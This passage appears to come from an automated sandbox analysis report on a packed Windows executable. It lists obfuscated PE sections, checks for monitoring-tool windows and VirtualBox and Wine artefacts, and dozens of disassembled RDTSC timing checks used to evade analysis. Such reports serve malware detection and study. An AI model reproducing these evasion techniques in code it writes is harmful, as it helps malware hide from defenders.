                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Section loaded: version.dll
                Source: TmmiCE5Ulm.exe Static file information: File size 2934784 > 1048576
                Source: TmmiCE5Ulm.exe Static PE information: Raw size of wlptngjz is bigger than: 0x100000 < 0x2a4800

                Data Obfuscation

                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Unpacked PE file: 0.2.TmmiCE5Ulm.exe.6f0000.0.unpack :EW;.rsrc :W;.idata :W;wlptngjz:EW;nuxtdfjk:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;wlptngjz:EW;nuxtdfjk:EW;.taggant:EW;
                Source: initial sample Static PE information: section where entry point is pointing to: .taggant
                Source: TmmiCE5Ulm.exe Static PE information: real checksum: 0x2cd7fe should be: 0x2d7788
                Source: TmmiCE5Ulm.exe Static PE information: section name:
                Source: TmmiCE5Ulm.exe Static PE information: section name: .rsrc
                Source: TmmiCE5Ulm.exe Static PE information: section name: .idata
                Source: TmmiCE5Ulm.exe Static PE information: section name: wlptngjz
                Source: TmmiCE5Ulm.exe Static PE information: section name: nuxtdfjk
                Source: TmmiCE5Ulm.exe Static PE information: section name: .taggant
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Code function: 0_3_011A9D05 push esi; retf 0_3_011A9D08
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Code function: 0_3_011AB336 pushad ; iretd 0_3_011AB36D
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Code function: 0_3_011A9887 push FFFFFFDBh; iretd 0_3_011A9898
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Code function: 0_3_0112C35E pushad ; ret 0_3_0112C361
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Code function: 0_3_0112CB7C push 78011A40h; retf 0_3_0112CB91
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Code function: 0_3_0112C362 pushad ; ret 0_3_0112C365
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Code function: 0_3_0112C366 push 680112C3h; ret 0_3_0112C36D
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Code function: 0_3_01132FC1 push esi; iretd 0_3_01132FC2
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Code function: 0_3_0118C350 push eax; ret 0_3_0118C351
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Code function: 0_3_0118C354 push eax; ret 0_3_0118C355
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Code function: 0_3_01117077 push eax; iretd 0_3_011170A5
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Code function: 0_3_0115ADB3 pushad ; ret 0_3_0115ADD1
                Source: TmmiCE5Ulm.exe Static PE information: section name: entropy: 7.98239541875244

                Boot Survival

                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Window searched: window name: FilemonClass
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Window searched: window name: PROCMON_WINDOW_CLASS
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Window searched: window name: RegmonClass
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Window searched: window name: Regmonclass
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Window searched: window name: Filemonclass
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe System information queried: FirmwareTableInformation
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe File opened: HKEY_CURRENT_USER\Software\Wine
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8BFA05 second address: 8BFA2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F05F0F594A6h 0x0000000c jmp 00007F05F0F5949Ch 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8C2066 second address: 8C206B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8C2172 second address: 8C21CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 jno 00007F05F0F594ADh 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007F05F0F59498h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 00000014h 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 add edi, dword ptr [ebp+122D2DF5h] 0x0000002f mov ecx, eax 0x00000031 jne 00007F05F0F59497h 0x00000037 cld 0x00000038 push 9AD9630Eh 0x0000003d pushad 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 pop eax 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8C21CD second address: 8C21E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F49763h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8C21E8 second address: 8C223A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 add dword ptr [esp], 65269D72h 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007F05F0F59498h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 0000001Ch 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 push 00000003h 0x0000002a mov dword ptr [ebp+122D26A8h], ebx 0x00000030 push 00000000h 0x00000032 mov si, C0BAh 0x00000036 push 00000003h 0x00000038 mov dword ptr [ebp+122D279Fh], esi 0x0000003e push 515D0900h 0x00000043 pushad 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8C223A second address: 8C223E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8C22F3 second address: 8C2364 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007F05F0F59498h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 0000001Bh 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 push esi 0x00000028 call 00007F05F0F594A8h 0x0000002d mov di, bx 0x00000030 pop edi 0x00000031 pop esi 0x00000032 push 00000000h 0x00000034 sub esi, 0EA2B86Ch 0x0000003a mov dword ptr [ebp+122D27C9h], edx 0x00000040 push 2ACB4DFEh 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007F05F0F5949Eh 0x0000004c rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8C2364 second address: 8C243C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F05F0F4975Ch 0x00000008 jc 00007F05F0F49756h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 xor dword ptr [esp], 2ACB4D7Eh 0x00000018 sub dword ptr [ebp+122D27F4h], ebx 0x0000001e push 00000003h 0x00000020 push edx 0x00000021 mov dword ptr [ebp+122D35EBh], edx 0x00000027 pop ecx 0x00000028 push 00000000h 0x0000002a jne 00007F05F0F4975Ch 0x00000030 push 00000003h 0x00000032 push 00000000h 0x00000034 push edx 0x00000035 call 00007F05F0F49758h 0x0000003a pop edx 0x0000003b mov dword ptr [esp+04h], edx 0x0000003f add dword ptr [esp+04h], 0000001Ch 0x00000047 inc edx 0x00000048 push edx 0x00000049 ret 0x0000004a pop edx 0x0000004b ret 0x0000004c push 94BE2F36h 0x00000051 pushad 0x00000052 push esi 0x00000053 jmp 00007F05F0F49763h 0x00000058 pop esi 0x00000059 jmp 00007F05F0F49767h 0x0000005e popad 0x0000005f xor dword ptr [esp], 54BE2F36h 0x00000066 jl 00007F05F0F49756h 0x0000006c lea ebx, dword ptr [ebp+1244DF35h] 0x00000072 call 00007F05F0F49768h 0x00000077 or dword ptr [ebp+122D278Fh], edi 0x0000007d pop ecx 0x0000007e push eax 0x0000007f push eax 0x00000080 push edx 0x00000081 push edi 0x00000082 jmp 00007F05F0F4975Bh 0x00000087 pop edi 0x00000088 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8E2767 second address: 8E276D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8E28FC second address: 8E2900 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8E2900 second address: 8E2904 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8E2BDE second address: 8E2BE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8E35EC second address: 8E35F2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8E3742 second address: 8E3746 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8E3746 second address: 8E3750 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8E3750 second address: 8E3781 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F49764h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F05F0F49760h 0x00000014 push eax 0x00000015 pop eax 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8D692F second address: 8D6969 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pushad 0x00000007 jmp 00007F05F0F594A5h 0x0000000c jmp 00007F05F0F5949Fh 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 push edi 0x00000018 jg 00007F05F0F59496h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8D6969 second address: 8D697E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jng 00007F05F0F49756h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8D697E second address: 8D69AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F594A7h 0x00000007 jmp 00007F05F0F594A0h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8D69AC second address: 8D69B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8B5AB6 second address: 8B5AC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F05F0F59496h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8B5AC0 second address: 8B5AE8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F49766h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a jnc 00007F05F0F49756h 0x00000010 pop ebx 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 push esi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8B5AE8 second address: 8B5AFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F05F0F59496h 0x0000000a pop esi 0x0000000b push edi 0x0000000c jnp 00007F05F0F59496h 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8B5AFF second address: 8B5B03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8B5B03 second address: 8B5B07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8E3FC0 second address: 8E3FE1 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F05F0F49756h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d pushad 0x0000000e push ecx 0x0000000f jmp 00007F05F0F4975Eh 0x00000014 pop ecx 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8E3FE1 second address: 8E3FEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8E4162 second address: 8E4199 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F05F0F4975Ch 0x00000008 pop ebx 0x00000009 jmp 00007F05F0F49764h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F05F0F4975Bh 0x00000019 push edx 0x0000001a pop edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8E4199 second address: 8E41B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F594A7h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8E41B6 second address: 8E41BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8E41BC second address: 8E41C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8E4737 second address: 8E473B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8E473B second address: 8E4741 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8E4741 second address: 8E4749 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8E4749 second address: 8E474D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8E474D second address: 8E4751 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8EB6F6 second address: 8EB6FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8EF6A3 second address: 8EF6BC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jg 00007F05F0F49756h 0x00000009 pop ebx 0x0000000a pushad 0x0000000b jp 00007F05F0F49756h 0x00000011 jno 00007F05F0F49756h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8EEEAF second address: 8EEEB6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8EF1E9 second address: 8EF1F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jo 00007F05F0F49756h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8EF346 second address: 8EF34A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8EF4E4 second address: 8EF4FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05F0F4975Dh 0x00000009 js 00007F05F0F49756h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8EF4FB second address: 8EF537 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F5949Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c js 00007F05F0F5949Ah 0x00000012 push edi 0x00000013 pop edi 0x00000014 pushad 0x00000015 popad 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 jbe 00007F05F0F59496h 0x0000001f jmp 00007F05F0F594A2h 0x00000024 popad 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8EF537 second address: 8EF53D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8F21AA second address: 8F220F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 je 00007F05F0F59496h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c add dword ptr [esp], 1C44F466h 0x00000013 push 00000000h 0x00000015 push esi 0x00000016 call 00007F05F0F59498h 0x0000001b pop esi 0x0000001c mov dword ptr [esp+04h], esi 0x00000020 add dword ptr [esp+04h], 0000001Dh 0x00000028 inc esi 0x00000029 push esi 0x0000002a ret 0x0000002b pop esi 0x0000002c ret 0x0000002d jmp 00007F05F0F594A0h 0x00000032 cld 0x00000033 push BD85BC10h 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007F05F0F594A5h 0x0000003f rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8F27BD second address: 8F27C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8F2E87 second address: 8F2E8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8F2E8D second address: 8F2E91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8F2E91 second address: 8F2EA3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push edi 0x0000000b pushad 0x0000000c popad 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8F2EA3 second address: 8F2EA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8F3200 second address: 8F320F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8F320F second address: 8F3229 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F49766h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8F4B69 second address: 8F4B6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8F69C4 second address: 8F69C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8F69C9 second address: 8F69CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8F7521 second address: 8F7525 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8F7525 second address: 8F752B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8FDECF second address: 8FDED3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8FDED3 second address: 8FDF5E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05F0F5949Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jns 00007F05F0F59498h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push eax 0x00000016 call 00007F05F0F59498h 0x0000001b pop eax 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 add dword ptr [esp+04h], 00000017h 0x00000028 inc eax 0x00000029 push eax 0x0000002a ret 0x0000002b pop eax 0x0000002c ret 0x0000002d mov dword ptr [ebp+1247195Ch], ecx 0x00000033 push 00000000h 0x00000035 mov edi, esi 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push edx 0x0000003c call 00007F05F0F59498h 0x00000041 pop edx 0x00000042 mov dword ptr [esp+04h], edx 0x00000046 add dword ptr [esp+04h], 00000015h 0x0000004e inc edx 0x0000004f push edx 0x00000050 ret 0x00000051 pop edx 0x00000052 ret 0x00000053 mov di, si 0x00000056 jmp 00007F05F0F594A1h 0x0000005b mov dword ptr [ebp+122D1F07h], ebx 0x00000061 push eax 0x00000062 push eax 0x00000063 push edx 0x00000064 jno 00007F05F0F5949Ch 0x0000006a rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8FDF5E second address: 8FDF71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05F0F4975Fh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8FEDD7 second address: 8FEE25 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 jmp 00007F05F0F594A0h 0x0000000e popad 0x0000000f popad 0x00000010 mov dword ptr [esp], eax 0x00000013 sub bl, FFFFFF81h 0x00000016 push 00000000h 0x00000018 pushad 0x00000019 mov esi, dword ptr [ebp+122D26FAh] 0x0000001f xor ebx, dword ptr [ebp+122D2FD1h] 0x00000025 popad 0x00000026 mov di, dx 0x00000029 push 00000000h 0x0000002b mov ebx, dword ptr [ebp+122D3977h] 0x00000031 mov di, dx 0x00000034 xchg eax, esi 0x00000035 push eax 0x00000036 push edx 0x00000037 ja 00007F05F0F5949Ch 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8FEE25 second address: 8FEE2F instructions: 0x00000000 rdtsc 0x00000002 jns 00007F05F0F4975Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 8FFEAE second address: 8FFEB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\TmmiCE5Ulm.exeRDTSC instruction interceptor: First address: 900F84 second address: 900F88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
